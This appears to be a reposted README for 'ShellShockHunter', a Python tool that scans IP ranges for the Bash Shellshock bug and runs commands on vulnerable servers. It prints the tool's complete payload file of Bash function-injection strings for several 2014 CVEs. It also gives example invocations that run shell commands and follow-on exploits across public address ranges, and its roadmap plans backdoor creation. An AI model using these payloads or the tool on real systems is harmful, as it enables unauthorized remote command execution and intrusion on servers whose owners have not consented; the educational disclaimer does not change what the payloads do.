ShellShockHunter - It's a simple tool for test vulnerability shellshock

Shellshock (software bug)

Shellshock, also known as Bashdoor, is a family of security bugs in the Unix Bash shell, the first of which was disclosed on 24 September 2014. Shellshock could enable an attacker to cause Bash to execute arbitrary commands and gain unauthorized access to many Internet-facing services, such as web servers, that use Bash to process requests.

Autor: MrCl0wn

Blog: http://blog.mrcl0wn.com

GitHub: https://github.com/MrCl0wnLab

Twitter: https://twitter.com/MrCl0wnLab

Email: mrcl0wnlab\@\gmail.com

Disclaimer

This or the previous program is for educational purposes ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that I (MrCl0wnLab) am not liable for any damages caused by the direct or indirect use of the information or functionality provided by these programs. The author or any Internet provider bears NO responsibility for content or misuse of these programs or any derivatives thereof. By using these programs you accept the fact that any damage (data loss, system crash, system compromise, etc.) caused by the use of these programs is not MrCl0wnLab's responsibility.

Installation

Use the package manager pip

Pip

pip install shodan
pip install ipinfo

Help

python main.py --help

                        
                                          ,/
                                        ,'/
                                      ,' /
                                    ,'  /_____,
                                  .'____    ,'    
                                        /  ,'
                                      / ,'
                                      /,'
                                    /'
             ____  _     _____ _     _     ____  _      ___       _    
            / ___|| |__ |___ /| |   | |   / ___|| |__  / _ \  ___| | __
            \___ \| '_ \  |_ \| |   | |   \___ \| '_ \| | | |/ __| |/ /
             ___) | | | |___) | |___| |___ ___) | | | | |_| | (__|   < 
            |____/|_| |_|____/|_____|_____|____/|_| |_|\___/ \___|_|\_\
                     __   _   _             _              __                  
                    | _| | | | |_   _ _ __ | |_ ___ _ __  |_ |                 
                    | |  | |_| | | | | '_ \| __/ _ \ '__|  | |                 
                    | |  |  _  | |_| | | | | ||  __/ |     | |                 
                    | |  |_| |_|\__,_|_| |_|\__\___|_|     | |                 
                    |__|                                  |__| v1.0                
                      By: MrCl0wn / https://blog.mrcl0wn.com                                                                          
         
usage: tool [-h] [--file <ips.txt>] [--range <ip-start>,<ip-end>] 
[--cmd-cgi <command shell>] [--exec-vuln <command shell>] [--thread <20>] 
[--check] [--ssl] [--cgi-file <cgi.txt>] [--timeout <5>] [--all] [--debug]

optional arguments:
  -h, --help                   show this help message and exit
  --file <ips.txt>             Input your target host lists
  --range <ip-start>,<ip-end>  Set range IP Eg.: 192.168.15.1,192.168.15.100
  --cmd-cgi <command shell>    Define shell command that will be executed in the payload
  --exec-vuln <command shell>  Executing commands on vulnerable targets
  --thread <20>, -t <20>       Eg. 20
  --check                      Check for shellshock vulnerability
  --ssl                        Enable request with SSL
  --cgi-file <cgi.txt>         Defines a CGI file to be used
  --timeout <5>                Set connection timeout
  --all                        Teste all payloads
  --debug, -d                  Enable debug mode

Command e.g:

python main.py --range '194.206.187.X,194.206.187.XXX' --check --thread 40 --ssl

python main.py --range '194.206.187.X,194.206.187.XXX' --check --thread 10 --ssl --cgi-file 'wordlist/cgi.txt'

python main.py --range '194.206.187.X,194.206.187.XXX' --cmd 'id;uname -a' --thread 10 --ssl --cgi-file 'wordlist/cgi.txt'

python main.py --file targets.txt --cmd 'id;uname -a' --thread 10 --ssl --cgi-file 'wordlist/cgi.txt'

python main.py --file targets.txt --cmd 'id;uname -a' --thread 10 --ssl --cgi-file 'wordlist/cgi.txt' --all

python main.py --range '194.206.187.X,194.206.187.XXX' --check --thread 40 --ssl --cgi-file 'wordlist/cgi2.txt' --exec-vuln 'curl -v -k -i "_TARGET_"'

python main.py --range '194.206.187.X,194.206.187.XXX' --check --thread 40 --ssl --cgi-file 'wordlist/cgi2.txt' --exec-vuln './exploit -t "_TARGET_"'

python main.py --range '194.206.187.X,194.206.187.XXX' --check --thread 40 --ssl --cgi-file 'wordlist/cgi2.txt' --exec-vuln './exploit -t "_TARGET_"' --debug

Prints:

START

Logo

PROCESS

Logo

SPECIAL COMMAND ( --exec-vuln 'echo "_TARGET_"' )

Logo

COMMAND ( --debug )

Logo--debug

Source file ( Exploits )

pwd: assets/exploits.json

{
    "DEFAULT":
        "() { :; }; echo ; /bin/bash -c '_COMMAND_'",
    "CVE-2014-6271": 
        "() { :; }; echo _CHECKER_; /bin/bash -c '_COMMAND_'",
    "CVE-2014-6271-2":
        "() { :;}; echo '_CHECKER_' 'BASH_FUNC_x()=() { :;}; echo _CHECKER_' bash -c 'echo _COMMAND_'",
    "CVE-2014-6271-3":
        "() { :; }; echo ; /bin/bash -c '_COMMAND_';echo _CHECKER_;",
    "CVE-2014-7169":
        "() { (a)=>\\' /bin/bash -c 'echo _CHECKER_'; cat echo",
    "CVE-2014-7186":
        "/bin/bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo '_CHECKER_, redir_stack'",
    "CVE-2014-7187":
        "(for x in {1..200} ; do echo \"for x$x in ; do :\"; done; for x in {1..200} ; do echo done ; done) | /bin/bash || echo '_CHECKER_, word_lineno'",
    "CVE-2014-6278":
        "() { _; } >_[$($())] { echo _CHECKER_; id; } /bin/bash -c '_COMMAND_'",
    "CVE-2014-6278-2":    
        "shellshocker='() { echo _CHECKER_; }' bash -c shellshocker",
    "CVE-2014-6277":
        "() { x() { _; }; x() { _; } <<a; } /bin/bash -c _COMMAND_;echo _CHECKER_",
    "CVE-2014-*":
        "() { }; echo _CHECKER_' /bin/bash -c '_COMMAND_'"
}

Source file ( Config )

pwd: assets/config.json

{
    "config": {
        "threads": 20,
        "path": {
            "path_output": "output/",
            "path_wordlist": "wordlist/",
            "path_modules": "modules/",
            "path_assets": "assets/"
        },
        "files_assets":{
            "config": "assets/config.json",
            "autor": "assets/autor.json",
            "exploits": "assets/exploits.json"
        },
        "api":{
            "shodan":"",
            "ipinfo":""
        }
    }
}

Tree

├── assets
│   ├── autor.json
│   ├── config.json
│   ├── exploits.json
│   └── prints
│       ├── banner.png
│       ├── print00.png
│       ├── print01.png
│       ├── print02.png
│       └── print03.png
├── LICENSE
├── main.py
├── modules
│   ├── banner_shock.py
│   ├── color_shock.py
│   ├── debug_shock.py
│   ├── file_shock.py
│   ├── __init__.py
│   ├── request_shock.py
│   ├── shodan_shock.py
│   └── thread_shock.py
├── output
│   └── vuln.txt
├── README.md
└── wordlist
    └── cgi.txt

Ref

Roadmap

I started this project to study a little more python and interact more with APIS like shodan and ipinfo.

  • Command line structure
  • Banner
  • File management class
  • HttpRequests management class
  • Thread management class
  • Source file for exploits
  • Color in process
  • Shell Exec on vulnerable targets
  • Process debug
  • Integration with ipinfo api
  • Integration with ipinfo api
  • Integration with telegram api
  • Backdoor creation
  • Visual filter
  • Header manipulation
February 15, 2021
Subscribe
Notify of
guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

0 Comments
Inline Feedbacks
View all comments
© HAKIN9 MEDIA SP. Z O.O. SP. K. 2013

Privacy Preference Center

Necessary

Cookies that are necessary for the site to function properly. This includes, storing the user's cookie consent state for the current domain, managing users carts to using the content network, Cloudflare, to identify trusted web traffic. See full Cookies declaration

gdpr, PYPF, woocommerce_cart_hash, woocommerce_items_in_cart, _wp_wocommerce_session, __cfduid [x2]

Marketing


tr, fr
ads/ga-audiences